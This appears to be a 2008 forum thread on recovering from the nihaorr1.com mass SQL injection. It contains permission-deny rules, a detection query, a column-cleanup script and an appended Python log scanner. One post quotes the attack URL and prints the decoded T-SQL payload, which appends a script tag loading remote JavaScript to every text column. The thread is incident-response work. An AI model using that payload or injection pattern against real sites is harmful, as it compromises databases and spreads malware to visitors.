  • Re: Anyone know about www.nihaorr1.com/1.js?

    May 07, 2008 05:25 PM|greenlit_design|LINK

    Thanks for posting this. It did help. I just wanted to contribute also to the group. We got SQL injected last night by this and this is how I fixed it.

    1) First to prevent script from executing or any further issues:

    deny select on sysobjects to sql_login_of_your_app
    deny select on syscomments to sql_login_of_your_app
    deny select on syscolumns to sql_login_of_your_app
    deny select on systypes to sql_login_of_your_app

    The script won't even get access to the sys tables anymore (you can add more but these are the minimum).


    2) Use what the hacker used.

    select a.name, b.name from sysobjects a, syscolumns b where a.id=b.id and a.xtype='u'
    and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)

    That query tells you what was infected.
    After a night without sleep and a few hours later, here is the script that will go through all the tables / columns and remove that string.

    Hope this helps. Don't hesitate if you have questions.
    Thanks




    Use DBname --- (your actual DB infected)
    go

    -- (if needed) drop table tmp_tableInfected
    create table tmp_tableInfected
          (t varchar(100),
           c varchar(100),
           total int)

    -- (if needed) truncate table tmp_tableInfected

    Declare @sqlInjectString varchar(200)

    --- here you specify the sql inject string. They used 2 different ones in our case
    Set @sqlInjectString = '<script src=http://www.nihaorr1.com/1.js></script>'

    DECLARE @T varchar(255),
            @C varchar(255)

    set nocount on

    -- first pass: every text-type column (ntext, text, nvarchar, varchar) of every user table
    DECLARE Table_Cursor
    CURSOR FOR
    select a.name,
           b.name from sysobjects a, syscolumns b
    where a.id=b.id and a.xtype='u'
    and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
    and a.name not in ('t_article', 'tbl_reviews', 'tbl_articles', 'tbl_reviews_BK','tbl_spotlights_BK')
    order by a.name, b.name

    OPEN Table_Cursor
    FETCH NEXT FROM Table_Cursor
    INTO @T,@C
    WHILE(@@FETCH_STATUS=0)
    BEGIN

          -- record each table/column that contains the injected string, with the row count
          Exec ('insert into tmp_tableInfected select '''
          +  @T +  ''','''
          +  @C + ''', count(*)  FROM [' + @T +'] (nolock) where ['
          + @C  + '] LIKE ''%'
          + @sqlInjectString + '%'' having count(*) > 0')

    FETCH NEXT FROM Table_Cursor INTO @T,@C
    END
    CLOSE Table_Cursor
    DEALLOCATE Table_Cursor

    -- second pass: print (or run) the cleanup statement for each infected column
    DECLARE fixSQLInject_Cursor
    CURSOR FOR
    select t,c from tmp_tableInfected

    OPEN fixSQLInject_Cursor
    FETCH NEXT FROM fixSQLInject_Cursor INTO @T,@C
    WHILE(@@FETCH_STATUS=0)
    BEGIN

          -- review the printed statements first, then uncomment the exec to apply them
          -- (replace() does not accept text/ntext columns; cast those to varchar(max)/nvarchar(max) first)
          Print 'update [' + @T + '] set [' + @C + '] = replace([' + @C + '],''' + @sqlInjectString + ''', '''')'
          --- exec ('update [' + @T + '] set [' + @C + '] = replace([' + @C + '],''' + @sqlInjectString + ''', '''')')

    FETCH NEXT FROM fixSQLInject_Cursor INTO @T,@C
    END
    CLOSE fixSQLInject_Cursor
    DEALLOCATE fixSQLInject_Cursor

    --select t,c,total from tmp_tableInfected

    drop table tmp_tableInfected
    powlette

    Long story short, it's definitely SQL injection. Here's the offending URL:

    orderitem.asp?IT=GM-204;DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x[hex payload omitted]

    Decoding that binary data, which is cast to a varchar, yields this:

    DECLARE @T varchar(255),@C varchar(255) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))+''<script src=nihaorr1.com/1.js></script>''')FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor

    And there you have it. It finds all text columns in the database and adds itself to it.
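A defender-side helper for the decoding step powlette describes: pull the CAST(0x... AS NVARCHAR(4000)) literal out of the request's query string in the IIS log and decode it (UTF-16LE, because it was cast to NVARCHAR), so you can see what was run before cleaning up. This is an added example, not code from the thread; the log lines, their field order and the hex-encoded sample statement are constructed for it.

```python
import re
from urllib.parse import unquote

# Matches CAST(0x<hex> AS NVARCHAR(n)) once the query string is URL-decoded.
# Case-insensitive because the casing varied between attack waves.
HEX_CAST_RE = re.compile(
    r"CAST\(\s*0x([0-9A-Fa-f]+)\s+AS\s+N?VARCHAR\s*\(\s*\d+\s*\)\s*\)",
    re.IGNORECASE,
)

def decode_hex_payload(hex_digits: str) -> str:
    """Recover the SQL text from the hex literal (UTF-16LE for NVARCHAR)."""
    raw = bytes.fromhex(hex_digits)
    try:
        return raw.decode("utf-16-le")
    except UnicodeDecodeError:
        # A CAST(... AS VARCHAR(n)) variant carries single-byte text instead.
        return raw.decode("latin-1")

def extract_injection(query_string: str):
    """Return the SQL hidden in a request's query string, or None if absent."""
    match = HEX_CAST_RE.search(unquote(query_string))
    return decode_hex_payload(match.group(1)) if match else None

def scan_iis_log(lines):
    """Return (client_ip, uri_stem, decoded_sql) for each suspicious W3C log line.

    Assumes the field order of the constructed sample: date time s-ip cs-method
    cs-uri-stem cs-uri-query c-ip sc-status (check your own #Fields header).
    """
    hits = []
    for line in lines:
        fields = line.split()
        if line.startswith("#") or len(fields) < 7:
            continue
        sql = extract_injection(fields[5])
        if sql is not None:
            hits.append((fields[6], fields[4], sql))
    return hits

# Constructed sample: a harmless statement hex-encoded the way the attack did,
# embedded in an IIS log next to a normal request for the same page.
SAMPLE_SQL = "DECLARE @T varchar(255),@C varchar(255) -- constructed sample"
SAMPLE_HEX = SAMPLE_SQL.encode("utf-16-le").hex().upper()
SAMPLE_LOG = [
    "#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query c-ip sc-status",
    "2008-05-06 23:41:02 10.0.0.5 GET /orderitem.asp IT=GM-204 203.0.113.9 200",
    "2008-05-06 23:41:09 10.0.0.5 GET /orderitem.asp IT=GM-204;DECLARE%20@S%20"
    "NVARCHAR(4000);SET%20@S=CAST(0x" + SAMPLE_HEX
    + "%20AS%20NVARCHAR(4000));EXEC(@S);-- 203.0.113.7 200",
]
```

Run `scan_iis_log` over a real log only after confirming the field positions against its `#Fields:` header; the client IP and decoded statement are what you want for the incident record.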